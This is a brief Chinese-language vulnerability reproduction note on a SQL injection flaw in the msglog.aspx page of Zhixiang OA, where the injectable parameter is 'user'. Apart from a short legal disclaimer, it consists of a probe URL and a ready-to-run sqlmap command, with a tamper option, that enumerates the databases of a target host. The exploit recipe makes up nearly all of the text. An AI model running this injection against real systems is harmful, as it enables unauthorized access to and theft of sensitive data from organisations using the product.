警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
目录
警告
一、概述
二、影响版本
三、漏洞复现
(一)可能的有的标志,添加如下payload:
(二)出现上述页面代表存在,下面sqlmap一跑即可:
一、概述
致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。注:注入参数为user。
二、影响版本
致翔OA产品,影响版本不详。
三、漏洞复现
(一)可能的有的标志,添加如下payload:
/mainpage/msglog.aspx?user=1
(二)出现上述页面代表存在,下面sqlmap一跑即可:
python .sqlmap.py -u "http://x.x.x.x/mainpage/msglog.aspx?user=1" -p user --dbs --tamper="between"
/mainpage/msglog.aspx?user=1



